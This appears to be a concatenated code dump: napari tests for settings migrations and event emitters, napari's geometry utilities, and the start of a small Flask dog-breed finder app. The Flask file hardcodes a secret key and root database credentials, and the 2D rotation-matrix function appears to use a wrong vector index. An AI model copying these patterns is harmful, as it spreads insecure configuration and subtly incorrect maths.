@pytest.fixture
def _test_migrator(monkeypatch):
# this fixture makes sure we're not using _migrations.MIGRATORS for tests
# but rather only using migrators that get declared IN the test
_TEST_MIGRATORS = []
with monkeypatch.context() as m:
m.setattr(_migrations, "_MIGRATORS", _TEST_MIGRATORS)
yield _migrations.migrator
def test_no_migrations_available(_test_migrator):
# no migrators exist... nothing should happen
settings = NapariSettings(schema_version='0.1.0')
assert settings.schema_version == '0.1.0'
def test_backwards_migrator(_test_migrator):
# we shouldn't be able to downgrade the schema version
# if that is needed later, we can create a new decorator,
# or change this test
with pytest.raises(AssertionError):
@_test_migrator('0.2.0', '0.1.0')
def _(model):
...
def test_migration_works(_test_migrator):
# test that a basic migrator works to change the version
# and mutate the model
@_test_migrator('0.1.0', '0.2.0')
def _(model: NapariSettings):
model.appearance.theme = 'light'
settings = NapariSettings(schema_version='0.1.0')
assert settings.schema_version == '0.2.0'
assert settings.appearance.theme == 'light'
def test_migration_saves(_test_migrator):
@_test_migrator('0.1.0', '0.2.0')
def _(model: NapariSettings):
...
with patch.object(NapariSettings, 'save') as mock:
mock.assert_not_called()
settings = NapariSettings(config_path='junk', schema_version='0.1.0')
assert settings.schema_version == '0.2.0'
mock.assert_called()
def test_failed_migration_leaves_version(_test_migrator):
# if an error occurs IN the migrator, the version should stay
# where it was before the migration, and any changes reverted.
@_test_migrator('0.1.0', '0.2.0')
def _(model: NapariSettings):
model.appearance.theme = 'light'
assert model.appearance.theme == 'light'
raise ValueError('broken migration')
with pytest.warns(UserWarning) as e:
settings = NapariSettings(schema_version='0.1.0')
assert settings.schema_version == '0.1.0'
# test migration was atomic, and reverted the theme change
assert settings.appearance.theme == 'dark'
# test that the user was warned
assert 'Failed to migrate settings from v0.1.0 to v0.2.0' in str(e[0])
@pytest.mark.skipif(
bool(os.environ.get('MIN_REQ')), reason='not relevant for MIN_REQ'
)
def test_030_to_040_migration():
# Prior to v0.4.0, npe2 plugins were automatically "disabled"
# 0.3.0 -> 0.4.0 should remove any installed npe2 plugins from the
# set of disabled plugins (see migrator for details)
try:
d = distribution('napari-svg')
assert 'napari.manifest' in {ep.group for ep in d.entry_points}
except Exception:
pytest.fail(
'napari-svg not present as an npe2 plugin. '
'This test needs updating'
)
settings = NapariSettings(
schema_version='0.3.0',
plugins={'disabled_plugins': {'napari-svg', 'napari'}},
)
assert 'napari-svg' not in settings.plugins.disabled_plugins
assert 'napari' not in settings.plugins.disabled_plugins
@pytest.mark.skipif(
bool(os.environ.get('MIN_REQ')), reason='not relevant for MIN_REQ'
)
def test_040_to_050_migration():
# Prior to 0.5.0 existing preferences may have reader extensions
# preferences saved without a leading *.
# fnmatch would fail on these so we coerce them to include a *
# e.g. '.csv' becomes '*.csv'
settings = NapariSettings(
schema_version='0.4.0',
plugins={'extension2reader': {'.tif': 'napari'}},
)
assert '.tif' not in settings.plugins.extension2reader
assert '*.tif' in settings.plugins.extension2reader
```
#### File: events/_tests/test_event_emitter.py
```python
import weakref
from functools import partial
import pytest
from napari.utils.events import EventEmitter
def test_event_blocker_count_none():
"""Test event emitter block counter with no emission."""
e = EventEmitter(type="test")
with e.blocker() as block:
pass
assert block.count == 0
def test_event_blocker_count():
"""Test event emitter block counter with emission."""
e = EventEmitter(type="test")
with e.blocker() as block:
e()
e()
e()
assert block.count == 3
def test_weakref_event_emitter():
"""
We are testing that an event blocker does not keep hard reference to
the object we are blocking, especially if it's a bound method.
The reason it used to keep references is to get the count of how many time
a callback was blocked, but if the object does not exists, then the bound method
does not and thus there is no way to ask for it's count.
so we can keep only weak refs.
"""
e = EventEmitter(type='test_weak')
class Obj:
def cb(self):
pass
o = Obj()
ref_o = weakref.ref(o)
e.connect(o.cb)
#
with e.blocker(o.cb):
e()
del o
assert ref_o() is None
@pytest.mark.parametrize('disconnect_and_should_be_none', [True, False])
def test_weakref_event_emitter_cb(disconnect_and_should_be_none):
"""
Note that as above but with pure callback, We keep a reference to it, the
reason is that unlike with bound method, the callback may be a closure and
may not stick around.
We thus expect the wekref to be None only if explicitely disconnected
"""
e = EventEmitter(type='test_weak')
def cb(self):
pass
ref_cb = weakref.ref(cb)
e.connect(cb)
with e.blocker(cb):
e()
if disconnect_and_should_be_none:
e.disconnect(cb)
del cb
assert ref_cb() is None
else:
del cb
assert ref_cb() is not None
def test_error_on_connect():
"""Check that connections happen correctly even on decorated methods.
Some decorators will alter method.__name__, so that obj.method
will not be equal to getattr(obj, obj.method.__name__). We check here
that event binding will be correct even in these situations.
"""
def rename(newname):
def decorator(f):
f.__name__ = newname
return f
return decorator
class Test:
def __init__(self):
self.m1, self.m2, self.m4 = 0, 0, 0
@rename("nonexist")
def meth1(self, _event):
self.m1 += 1
@rename("meth1")
def meth2(self, _event):
self.m2 += 1
def meth3(self):
pass
def meth4(self, _event):
self.m4 += 1
t = Test()
e = EventEmitter(type="test")
e.connect(t.meth1)
e()
assert (t.m1, t.m2) == (1, 0)
e.connect(t.meth2)
e()
assert (t.m1, t.m2) == (2, 1)
meth = t.meth3
t.meth3 = "aaaa"
with pytest.raises(RuntimeError):
e.connect(meth)
e.connect(t.meth4)
assert t.m4 == 0
e()
assert t.m4 == 1
t.meth4 = None
with pytest.warns(RuntimeWarning, match="Problem with function"):
e()
assert t.m4 == 1
def test_event_order_func():
res_li = []
def fun1():
res_li.append(1)
def fun2(val):
res_li.append(val)
def fun3():
res_li.append(3)
def fun4():
res_li.append(4)
def fun5(val):
res_li.append(val)
def fun6(val):
res_li.append(val)
fun1.__module__ = "napari.test.sample"
fun3.__module__ = "napari.test.sample"
fun5.__module__ = "napari.test.sample"
e = EventEmitter(type="test")
e.connect(fun1)
e.connect(partial(fun2, val=2))
e()
assert res_li == [1, 2]
res_li = []
e.connect(fun3)
e()
assert res_li == [3, 1, 2]
res_li = []
e.connect(fun4)
e()
assert res_li == [3, 1, 4, 2]
res_li = []
e.connect(partial(fun5, val=5), position="last")
e()
assert res_li == [3, 1, 5, 4, 2]
res_li = []
e.connect(partial(fun6, val=6), position="last")
e()
assert res_li == [3, 1, 5, 4, 2, 6]
def test_event_order_methods():
res_li = []
class Test:
def fun1(self):
res_li.append(1)
def fun2(self):
res_li.append(2)
class Test2:
def fun3(self):
res_li.append(3)
def fun4(self):
res_li.append(4)
Test.__module__ = "napari.test.sample"
t1 = Test()
t2 = Test2()
e = EventEmitter(type="test")
e.connect(t1.fun1)
e.connect(t2.fun3)
e()
assert res_li == [1, 3]
res_li = []
e.connect(t1.fun2)
e.connect(t2.fun4)
e()
assert res_li == [2, 1, 4, 3]
def test_no_event_arg():
class TestOb:
def __init__(self):
self.count = 0
def fun(self):
self.count += 1
count = [0]
def simple_fun():
count[0] += 1
t = TestOb()
e = EventEmitter(type="test")
e.connect(t.fun)
e.connect(simple_fun)
e()
assert t.count == 1
assert count[0] == 1
def test_to_many_positional():
class TestOb:
def fun(self, a, b, c=1):
pass
def simple_fun(a, b):
pass
t = TestOb()
e = EventEmitter(type="test")
with pytest.raises(RuntimeError):
e.connect(t.fun)
with pytest.raises(RuntimeError):
e.connect(simple_fun)
def test_disconnect_object():
count_list = []
def fun1():
count_list.append(1)
class TestOb:
call_list_1 = []
call_list_2 = []
def fun1(self):
self.call_list_1.append(1)
def fun2(self):
self.call_list_2.append(1)
t = TestOb()
e = EventEmitter(type="test")
e.connect(t.fun1)
e.connect(t.fun2)
e.connect(fun1)
e()
assert t.call_list_1 == [1]
assert t.call_list_2 == [1]
assert count_list == [1]
e.disconnect(t)
e()
assert t.call_list_1 == [1]
assert t.call_list_2 == [1]
assert count_list == [1, 1]
def test_weakref_disconnect():
class TestOb:
call_list_1 = []
def fun1(self):
self.call_list_1.append(1)
def fun2(self, event):
self.call_list_1.append(2)
t = TestOb()
e = EventEmitter(type="test")
e.connect(t.fun1)
e()
assert t.call_list_1 == [1]
e.disconnect((weakref.ref(t), "fun1"))
e()
assert t.call_list_1 == [1]
e.connect(t.fun2)
e()
assert t.call_list_1 == [1, 2]
def test_none_disconnect():
count_list = []
def fun1():
count_list.append(1)
def fun2(event):
count_list.append(2)
e = EventEmitter(type="test")
e.connect(fun1)
e()
assert count_list == [1]
e.disconnect(None)
e()
assert count_list == [1]
e.connect(fun2)
e()
assert count_list == [1, 2]
```
#### File: napari/utils/geometry.py
```python
from typing import Dict, Optional, Tuple
import numpy as np
# normal vectors for a 3D axis-aligned box
# coordinates are ordered [z, y, x]
FACE_NORMALS = {
"x_pos": np.array([0, 0, 1]),
"x_neg": np.array([0, 0, -1]),
"y_pos": np.array([0, 1, 0]),
"y_neg": np.array([0, -1, 0]),
"z_pos": np.array([1, 0, 0]),
"z_neg": np.array([-1, 0, 0]),
}
def project_points_onto_plane(
points: np.ndarray, plane_point: np.ndarray, plane_normal: np.ndarray
) -> Tuple[np.ndarray, np.ndarray]:
"""Project points on to a plane.
Plane is defined by a point and a normal vector. This function
is designed to work with points and planes in 3D.
Parameters
----------
points : np.ndarray
The coordinate of the point to be projected. The points
should be 3D and have shape shape (N,3) for N points.
plane_point : np.ndarray
The point on the plane used to define the plane.
Should have shape (3,).
plane_normal : np.ndarray
The normal vector used to define the plane.
Should be a unit vector and have shape (3,).
Returns
-------
projected_point : np.ndarray
The point that has been projected to the plane.
This is always an Nx3 array.
signed_distance_to_plane : np.ndarray
The signed projection distance between the points and the plane.
Positive values indicate the point is on the positive normal side of the plane.
Negative values indicate the point is on the negative normal side of the plane.
"""
points = np.atleast_2d(points)
plane_point = np.asarray(plane_point)
# make the plane normals have the same shape as the points
plane_normal = np.tile(plane_normal, (points.shape[0], 1))
# get the vector from point on the plane
# to the point to be projected
point_vector = points - plane_point
# find the distance to the plane along the normal direction
signed_distance_to_plane = np.multiply(point_vector, plane_normal).sum(
axis=1
)
# project the point
projected_points = points - (
signed_distance_to_plane[:, np.newaxis] * plane_normal
)
return projected_points, signed_distance_to_plane
def rotation_matrix_from_vectors_2d(
vec_1: np.ndarray, vec_2: np.ndarray
) -> np.ndarray:
"""Calculate the 2D rotation matrix to rotate vec_1 onto vec_2
Parameters
----------
vec_1 : np.ndarray
The (2,) array containing the starting vector.
vec_2 : np.ndarray
The (2,) array containing the destination vector.
Returns
-------
rotation_matrix : np.ndarray
The (2, 2) tranformation matrix that rotates vec_1 to vec_2.
"""
# ensure unit vectors
vec_1 = vec_1 / np.linalg.norm(vec_1)
vec_2 = vec_2 / np.linalg.norm(vec_2)
# calculate the rotation matrix
diagonal_1 = (vec_1[0] * vec_2[0]) + (vec_1[1] * vec_2[1])
diagonal_2 = (vec_1[0] * vec_2[1]) - (vec_2[0] * vec_1[0])
rotation_matrix = np.array(
[[diagonal_1, -1 * diagonal_2], [diagonal_2, diagonal_1]]
)
return rotation_matrix
def rotation_matrix_from_vectors_3d(vec_1, vec_2):
"""Calculate the rotation matrix that aligns vec1 to vec2.
Parameters
----------
vec_1 : np.ndarray
The vector you want to rotate
vec_2 : np.ndarray
The vector you would like to align to.
Returns
-------
rotation_matrix : np.ndarray
The rotation matrix that aligns vec_1 with vec_2.
That is rotation_matrix.dot(vec_1) == vec_2
"""
vec_1 = (vec_1 / np.linalg.norm(vec_1)).reshape(3)
vec_2 = (vec_2 / np.linalg.norm(vec_2)).reshape(3)
cross_prod = np.cross(vec_1, vec_2)
dot_prod = np.dot(vec_1, vec_2)
if any(cross_prod): # if not all zeros then
s = np.linalg.norm(cross_prod)
kmat = np.array(
[
[0, -cross_prod[2], cross_prod[1]],
[cross_prod[2], 0, -cross_prod[0]],
[-cross_prod[1], cross_prod[0], 0],
]
)
rotation_matrix = (
np.eye(3) + kmat + kmat.dot(kmat) * ((1 - dot_prod) / (s**2))
)
else:
if np.allclose(dot_prod, 1):
# if the vectors are already aligned, return the identity
rotation_matrix = np.eye(3)
else:
# if the vectors are in opposite direction, rotate 180 degrees
rotation_matrix = np.diag([-1, -1, 1])
return rotation_matrix
def rotate_points(
points: np.ndarray,
current_plane_normal: np.ndarray,
new_plane_normal: np.ndarray,
) -> Tuple[np.ndarray, np.ndarray]:
"""Rotate points using a rotation matrix defined by the rotation from
current_plane to new_plane.
Parameters
----------
points : np.ndarray
The points to rotate. They should all lie on the same plane with the
normal vector current_plane_normal. Should be (NxD) array.
current_plane_normal : np.ndarray
The normal vector for the plane the points currently reside on.
new_plane_normal : np.ndarray
The normal vector for the plane the points will be rotated to.
Returns
-------
rotated_points : np.ndarray
The points that have been rotated
rotation_matrix : np.ndarray
The rotation matrix used for rotating the points.
"""
rotation_matrix = rotation_matrix_from_vectors_3d(
current_plane_normal, new_plane_normal
)
rotated_points = points @ rotation_matrix.T
return rotated_points, rotation_matrix
def point_in_bounding_box(point: np.ndarray, bounding_box: np.ndarray) -> bool:
"""Determine whether an nD point is inside an nD bounding box.
Parameters
----------
point : np.ndarray
(n,) array containing nD point coordinates to check.
bounding_box : np.ndarray
(2, n) array containing the min and max of the nD bounding box.
As returned by `Layer._extent_data`.
"""
if np.all(point >= bounding_box[0]) and np.all(point <= bounding_box[1]):
return True
return False
def clamp_point_to_bounding_box(point: np.ndarray, bounding_box: np.ndarray):
"""Ensure that a point is inside of the bounding box. If the point has a
coordinate outside of the bounding box, the value is clipped to the max
extent of the bounding box.
Parameters
----------
point : np.ndarray
n-dimensional point as an (n,) ndarray. Multiple points can
be passed as an (n, D) array.
bounding_box : np.ndarray
n-dimensional bounding box as a (n, 2) ndarray
Returns
-------
clamped_point : np.ndarray
`point` clamped to the limits of `bounding_box`
"""
clamped_point = np.clip(point, bounding_box[:, 0], bounding_box[:, 1] - 1)
return clamped_point
def face_coordinate_from_bounding_box(
bounding_box: np.ndarray, face_normal: np.ndarray
) -> float:
"""Get the coordinate for a given face in an axis-aligned bounding box.
For example, if the bounding box has extents [[0, 10], [0, 20], [0, 30]]
(ordered zyx), then the face with normal [0, 1, 0] is described by
y=20. Thus, the face_coordinate in this case is 20.
Parameters
----------
bounding_box : np.ndarray
n-dimensional bounding box as a (n, 2) ndarray.
Each row should contain the [min, max] extents for the
axis.
face_normal : np.ndarray
normal vector of the face as an (n,) ndarray
Returns
-------
face_coordinate : float
The value where the bounding box face specified by face_normal intersects
the axis its normal is aligned with.
"""
axis = np.argwhere(face_normal)
if face_normal[axis] > 0:
# face is pointing in the positive direction,
# take the max extent
face_coordinate = bounding_box[axis, 1]
else:
# face is pointing in the negative direction,
# take the min extent
face_coordinate = bounding_box[axis, 0]
return face_coordinate
def intersect_line_with_axis_aligned_plane(
plane_intercept: float,
plane_normal: np.ndarray,
line_start: np.ndarray,
line_direction: np.ndarray,
) -> np.ndarray:
"""Find the intersection of a line with an axis aligned plane.
Parameters
----------
plane_intercept : float
The coordinate that the plane intersects on the axis to which plane is
normal.
For example, if the plane is described by y=42, plane_intercept is 42.
plane_normal : np.ndarray
normal vector of the plane as an (n,) ndarray
line_start : np.ndarray
start point of the line as an (n,) ndarray
line_direction : np.ndarray
direction vector of the line as an (n,) ndarray
Returns
-------
intersection_point : np.ndarray
point where the line intersects the axis aligned plane
"""
# find the axis the plane exists in
plane_axis = np.squeeze(np.argwhere(plane_normal))
# get the intersection coordinate
t = (plane_intercept - line_start[plane_axis]) / line_direction[plane_axis]
return line_start + t * line_direction
def bounding_box_to_face_vertices(
bounding_box: np.ndarray,
) -> Dict[str, np.ndarray]:
"""From a layer bounding box (N, 2), N=ndim, return a dictionary containing
the vertices of each face of the bounding_box.
Parameters
----------
bounding_box : np.ndarray
(N, 2), N=ndim array with the min and max value for each dimension of
the bounding box. The bounding box is take form the last
three rows, which are assumed to be in order (z, y, x).
Returns
-------
face_coords : Dict[str, np.ndarray]
A dictionary containing the coordinates for the vertices for each face.
The keys are strings: 'x_pos', 'x_neg', 'y_pos', 'y_neg', 'z_pos', 'z_neg'.
'x_pos' is the face with the normal in the positive x direction and
'x_neg' is the face with the normal in the negative direction.
Coordinates are ordered (z, y, x).
"""
x_min, x_max = bounding_box[-1, :]
y_min, y_max = bounding_box[-2, :]
z_min, z_max = bounding_box[-3, :]
face_coords = {
"x_pos": np.array(
[
[z_min, y_min, x_max],
[z_min, y_max, x_max],
[z_max, y_max, x_max],
[z_max, y_min, x_max],
]
),
"x_neg": np.array(
[
[z_min, y_min, x_min],
[z_min, y_max, x_min],
[z_max, y_max, x_min],
[z_max, y_min, x_min],
]
),
"y_pos": np.array(
[
[z_min, y_max, x_min],
[z_min, y_max, x_max],
[z_max, y_max, x_max],
[z_max, y_max, x_min],
]
),
"y_neg": np.array(
[
[z_min, y_min, x_min],
[z_min, y_min, x_max],
[z_max, y_min, x_max],
[z_max, y_min, x_min],
]
),
"z_pos": np.array(
[
[z_max, y_min, x_min],
[z_max, y_min, x_max],
[z_max, y_max, x_max],
[z_max, y_max, x_min],
]
),
"z_neg": np.array(
[
[z_min, y_min, x_min],
[z_min, y_min, x_max],
[z_min, y_max, x_max],
[z_min, y_max, x_min],
]
),
}
return face_coords
def inside_triangles(triangles):
"""Checks which triangles contain the origin
Parameters
----------
triangles : (N, 3, 2) array
Array of N triangles that should be checked
Returns
-------
inside : (N,) array of bool
Array with `True` values for triangles containing the origin
"""
AB = triangles[:, 1, :] - triangles[:, 0, :]
AC = triangles[:, 2, :] - triangles[:, 0, :]
BC = triangles[:, 2, :] - triangles[:, 1, :]
s_AB = -AB[:, 0] * triangles[:, 0, 1] + AB[:, 1] * triangles[:, 0, 0] >= 0
s_AC = -AC[:, 0] * triangles[:, 0, 1] + AC[:, 1] * triangles[:, 0, 0] >= 0
s_BC = -BC[:, 0] * triangles[:, 1, 1] + BC[:, 1] * triangles[:, 1, 0] >= 0
inside = np.all(np.array([s_AB != s_AC, s_AB == s_BC]), axis=0)
return inside
def intersect_line_with_plane_3d(
line_position: np.ndarray,
line_direction: np.ndarray,
plane_position: np.ndarray,
plane_normal: np.ndarray,
) -> np.ndarray:
"""Find the intersection of a line with an arbitrarily oriented plane in 3D.
The line is defined by a position and a direction vector.
The plane is defined by a position and a normal vector.
https://en.wikipedia.org/wiki/Line%E2%80%93plane_intersection
Parameters
----------
line_position : np.ndarray
a position on a 3D line with shape (3,).
line_direction : np.ndarray
direction of the 3D line with shape (3,).
plane_position : np.ndarray
a position on a plane in 3D with shape (3,).
plane_normal : np.ndarray
a vector normal to the plane in 3D with shape (3,).
Returns
-------
plane_intersection : np.ndarray
the intersection of the line with the plane, shape (3,)
"""
# cast to arrays
line_position = np.asarray(line_position, dtype=float)
line_direction = np.asarray(line_direction, dtype=float)
plane_position = np.asarray(plane_position, dtype=float)
plane_normal = np.asarray(plane_normal, dtype=float)
# project direction between line and plane onto the plane normal
line_plane_direction = plane_position - line_position
line_plane_on_plane_normal = np.dot(line_plane_direction, plane_normal)
# project line direction onto the plane normal
line_direction_on_plane_normal = np.dot(line_direction, plane_normal)
# find scale factor for line direction
scale_factor = line_plane_on_plane_normal / line_direction_on_plane_normal
return line_position + (scale_factor * line_direction)
def intersect_line_with_multiple_planes_3d(
line_position: np.ndarray,
line_direction: np.ndarray,
plane_position: np.ndarray,
plane_normal: np.ndarray,
) -> np.ndarray:
"""Find the intersection of a line with multiple arbitrarily oriented planes in 3D.
The line is defined by a position and a direction vector.
The plane is defined by a position and a normal vector.
https://en.wikipedia.org/wiki/Line%E2%80%93plane_intersection
Parameters
----------
line_position : np.ndarray
a position on a 3D line with shape (3,).
line_direction : np.ndarray
direction of the 3D line with shape (3,).
plane_position : np.ndarray
point on a plane in 3D with shape (n, 3) for n planes.
plane_normal : np.ndarray
a vector normal to the plane in 3D with shape (n,3) for n planes.
Returns
-------
plane_intersection : np.ndarray
the intersection of the line with the plane, shape (3,)
"""
# cast to arrays
line_position = np.asarray(line_position, dtype=float)
line_direction = np.asarray(line_direction, dtype=float)
plane_position = np.atleast_2d(plane_position).astype(float)
plane_normal = np.atleast_2d(plane_normal).astype(float)
# project direction between line and plane onto the plane normal
line_plane_direction = plane_position - line_position
line_plane_on_plane_normal = np.sum(
line_plane_direction * plane_normal, axis=1
)
# project line direction onto the plane normal
line_direction_on_plane_normal = np.sum(
line_direction * plane_normal, axis=1
)
# find scale factor for line direction
scale_factor = line_plane_on_plane_normal / line_direction_on_plane_normal
# if plane_position.ndim == 2:
repeated_line_position = np.repeat(
line_position[np.newaxis, :], len(scale_factor), axis=0
)
repeated_line_direction = np.repeat(
line_direction[np.newaxis, :], len(scale_factor), axis=0
)
return repeated_line_position + (
np.expand_dims(scale_factor, axis=1) * repeated_line_direction
)
def intersect_line_with_triangles(
line_point: np.ndarray, line_direction: np.ndarray, triangles: np.ndarray
) -> np.ndarray:
"""Find the intersection of a ray with a set of triangles.
This function does not test whether the ray intersects the triangles, so you should
have tested for intersection first. See line_in_triangles_3d() for testing for
intersection.
Parameters
----------
line_point : np.ndarray
The (3,) array containing the starting point of the ray.
line_direction : np.ndarray
The (3,) array containing the unit vector in the direction of the ray.
triangles : np.ndarray
The 3D vertices of the triangles. Should be (n, 3, 3) for n triangles. Axis 1
indexes each vertex and axis 2 contains the coordinates. That to access the
0th vertex from triangle index 3, one would use: triangles[3, 0, :].
Returns
-------
intersection_points : np.ndarray
(n, 3) array containing the point at which the specified ray intersects
the each triangle.
"""
edge_1 = triangles[:, 1, :] - triangles[:, 0, :]
edge_2 = triangles[:, 2, :] - triangles[:, 0, :]
triangle_normals = np.cross(edge_1, edge_2)
triangle_normals = triangle_normals / np.expand_dims(
np.linalg.norm(triangle_normals, axis=1), 1
)
intersection_points = intersect_line_with_multiple_planes_3d(
line_position=line_point,
line_direction=line_direction,
plane_position=triangles[:, 0, :],
plane_normal=triangle_normals,
)
return intersection_points
def point_in_quadrilateral_2d(
point: np.ndarray, quadrilateral: np.ndarray
) -> bool:
"""Determines whether a point is inside a 2D quadrilateral.
Parameters
----------
point : np.ndarray
(2,) array containing coordinates of a point.
quadrilateral : np.ndarray
(4, 2) array containing the coordinates for the 4 corners
of a quadrilateral. The vertices should be in clockwise order
such that indexing with [0, 1, 2], and [0, 2, 3] results in
the two non-overlapping triangles that divide the
quadrilateral.
Returns
-------
"""
triangle_vertices = np.stack(
(quadrilateral[[0, 1, 2]], quadrilateral[[0, 2, 3]])
)
in_triangles = inside_triangles(triangle_vertices - point)
if in_triangles.sum() < 1:
return False
else:
return True
def line_in_quadrilateral_3d(
line_point: np.ndarray,
line_direction: np.ndarray,
quadrilateral: np.ndarray,
) -> bool:
"""Determine if a line goes tbrough any of a set of quadrilaterals.
For example, this could be used to determine if a click was
in a specific face of a bounding box.
Parameters
----------
line_point : np.ndarray
(3,) array containing the location that was clicked. This
should be in the same coordinate system as the vertices.
line_direction : np.ndarray
(3,) array describing the direction camera is pointing in
the scene. This should be in the same coordinate system as
the vertices.
quadrilateral : np.ndarray
(4, 3) array containing the coordinates for the 4 corners
of a quadrilateral. The vertices should be in clockwise order
such that indexing with [0, 1, 2], and [0, 2, 3] results in
the two non-overlapping triangles that divide the quadrilateral.
Returns
-------
in_region : bool
True if the click is in the region specified by vertices.
"""
# project the vertices of the bound region on to the view plane
vertices_plane, _ = project_points_onto_plane(
points=quadrilateral,
plane_point=line_point,
plane_normal=line_direction,
)
# rotate the plane to make the triangles 2D
rotated_vertices, rotation_matrix = rotate_points(
points=vertices_plane,
current_plane_normal=line_direction,
new_plane_normal=[0, 0, 1],
)
quadrilateral_2D = rotated_vertices[:, :2]
click_pos_2D = rotation_matrix.dot(line_point)[:2]
return point_in_quadrilateral_2d(click_pos_2D, quadrilateral_2D)
def line_in_triangles_3d(
line_point: np.ndarray, line_direction: np.ndarray, triangles: np.ndarray
):
"""Determine if a line goes through any of a set of triangles.
For example, this could be used to determine if a click was
in a triangle of a mesh.
Parameters
----------
line_point : np.ndarray
(3,) array containing the location that was clicked. This
should be in the same coordinate system as the vertices.
line_direction : np.ndarray
(3,) array describing the direction camera is pointing in
the scene. This should be in the same coordinate system as
the vertices.
triangles : np.ndarray
(n, 3, 3) array containing the coordinates for the 3 corners
of n triangles.
Returns
-------
in_triangles : np.ndarray
(n,) boolean array that is True of the ray intersects the triangle
"""
vertices = triangles.reshape((-1, triangles.shape[2]))
# project the vertices of the bound region on to the view plane
vertices_plane, _ = project_points_onto_plane(
points=vertices, plane_point=line_point, plane_normal=line_direction
)
# rotate the plane to make the triangles 2D
rotation_matrix = rotation_matrix_from_vectors_3d(
line_direction, [0, 0, 1]
)
rotated_vertices = vertices_plane @ rotation_matrix.T
rotated_vertices_2d = rotated_vertices[:, :2]
rotated_triangles_2d = rotated_vertices_2d.reshape(-1, 3, 2)
line_pos_2D = rotation_matrix.dot(line_point)[:2]
return inside_triangles(rotated_triangles_2d - line_pos_2D)
def find_front_back_face(
click_pos: np.ndarray, bounding_box: np.ndarray, view_dir: np.ndarray
):
"""Find the faces of an axis aligned bounding box a
click intersects with.
Parameters
----------
click_pos : np.ndarray
(3,) array containing the location that was clicked.
bounding_box : np.ndarray
(N, 2), N=ndim array with the min and max value for each dimension of
the bounding box. The bounding box is take form the last
three rows, which are assumed to be in order (z, y, x).
This should be in the same coordinate system as click_pos.
view_dir
(3,) array describing the direction camera is pointing in
the scene. This should be in the same coordinate system as click_pos.
Returns
-------
front_face_normal : np.ndarray
The (3,) normal vector of the face closest to the camera the click
intersects with.
back_face_normal : np.ndarray
The (3,) normal vector of the face farthest from the camera the click
intersects with.
"""
front_face_normal = None
back_face_normal = None
bbox_face_coords = bounding_box_to_face_vertices(bounding_box)
for k, v in FACE_NORMALS.items():
if (np.dot(view_dir, v) + 0.001) < 0:
if line_in_quadrilateral_3d(
click_pos, view_dir, bbox_face_coords[k]
):
front_face_normal = v
elif (np.dot(view_dir, v) + 0.001) > 0:
if line_in_quadrilateral_3d(
click_pos, view_dir, bbox_face_coords[k]
):
back_face_normal = v
if front_face_normal is not None and back_face_normal is not None:
# stop looping if both the front and back faces have been found
break
return front_face_normal, back_face_normal
def intersect_line_with_axis_aligned_bounding_box_3d(
line_point: np.ndarray,
line_direction: np.ndarray,
bounding_box: np.ndarray,
face_normal: np.ndarray,
):
"""Find the intersection of a ray with the specified face of an
axis-aligned bounding box.
Parameters
----------
face_normal : np.ndarray
The (3,) normal vector of the face the click intersects with.
line_point : np.ndarray
(3,) array containing the location that was clicked.
bounding_box : np.ndarray
(N, 2), N=ndim array with the min and max value for each dimension of
the bounding box. The bounding box is take form the last
three rows, which are assumed to be in order (z, y, x).
This should be in the same coordinate system as click_pos.
line_direction
(3,) array describing the direction camera is pointing in
the scene. This should be in the same coordinate system as click_pos.
Returns
-------
intersection_point : np.ndarray
(3,) array containing the coordinate for the intersection of the click on
the specified face.
"""
front_face_coordinate = face_coordinate_from_bounding_box(
bounding_box, face_normal
)
intersection_point = np.squeeze(
intersect_line_with_axis_aligned_plane(
front_face_coordinate,
face_normal,
line_point,
-line_direction,
)
)
return intersection_point
def distance_between_point_and_line_3d(
point: np.ndarray, line_position: np.ndarray, line_direction: np.ndarray
):
"""Determine the minimum distance between a point and a line in 3D.
Parameters
----------
point : np.ndarray
(3,) array containing coordinates of a point in 3D space.
line_position : np.ndarray
(3,) array containing coordinates of a point on a line in 3D space.
line_direction : np.ndarray
(3,) array containing a vector describing the direction of a line in
3D space.
Returns
-------
distance : float
The minimum distance between `point` and the line defined by
`line_position` and `line_direction`.
"""
line_direction_normalized = line_direction / np.linalg.norm(line_direction)
projection_on_line_direction = np.dot(
(point - line_position), line_direction
)
closest_point_on_line = (
line_position
+ line_direction_normalized * projection_on_line_direction
)
distance = np.linalg.norm(point - closest_point_on_line)
return distance
def find_nearest_triangle_intersection(
ray_position: np.ndarray, ray_direction: np.ndarray, triangles: np.ndarray
) -> Tuple[Optional[int], Optional[np.ndarray]]:
"""Given an array of triangles, find the index and intersection location
of a ray and the nearest triangle.
This returns only the triangle closest to the the ray_position.
Parameters
----------
ray_position : np.ndarray
The coordinate of the starting point of the ray.
ray_direction : np.ndarray
A unit vector describing the direction of the ray.
triangles : np.ndarray
(N, 3, 3) array containing the vertices of the triangles.
Returns
-------
closest_intersected_triangle_index : int
The index of the intersected triangle.
intersection : np.ndarray
The coordinate of where the ray intersects the triangle.
"""
inside = line_in_triangles_3d(
line_point=ray_position,
line_direction=ray_direction,
triangles=triangles,
)
n_intersected_triangles = np.sum(inside)
if n_intersected_triangles == 0:
return None, None
# find the intersection points for the
intersected_triangles = triangles[inside]
intersection_points = intersect_line_with_triangles(
line_point=ray_position,
line_direction=ray_direction,
triangles=intersected_triangles,
)
# find the intersection closest to the start point of the ray and return
start_to_intersection = intersection_points - ray_position
distances = np.linalg.norm(start_to_intersection, axis=1)
closest_triangle_index = np.argmin(distances)
intersected_triangle_indices = np.argwhere(inside)
closest_intersected_triangle_index = intersected_triangle_indices[
closest_triangle_index
][0]
intersection = intersection_points[closest_triangle_index]
return closest_intersected_triangle_index, intersection
``` |
{
"source": "jojo-en-code/foundations-project-template",
"score": 3
} |
#### File: foundations-project-template/dog_finder/score_analyzer.py
```python
def calculate_range(dog_breed_list, score):
dog_breed_range_list = []
for dog_breed in dog_breed_list:
min_score=dog_breed.min_score
max_score=dog_breed.max_score
if score > min_score and score < max_score:
dog_name=dog_breed.name
dog_breed_range_list.append(dog_name)
return dog_breed_range_list
```
#### File: foundations-project-template/dog_finder/website.py
```python
from flask import Flask
from flask import render_template, request, flash, redirect, url_for, jsonify
from os import path
import pymysql
from werkzeug.security import generate_password_hash, check_password_hash
from flask_login import LoginManager
from flask_login import login_user, login_required, logout_user, current_user
from dog_finder.models import db, User, Dog_breed
from dog_finder.score_analyzer import calculate_range
app = Flask(__name__)
app.config['SECRET_KEY'] = 'dqddececcad efde'
app.config['SQLALCHEMY_DATABASE_URI'] = 'mysql+pymysql://root:password@localhost/dbschema'
db.init_app(app)
app.config.from_pyfile("config.py")
@app.route('/')
def home():
return render_template('home.html', page_title="Danas Dog Finder")
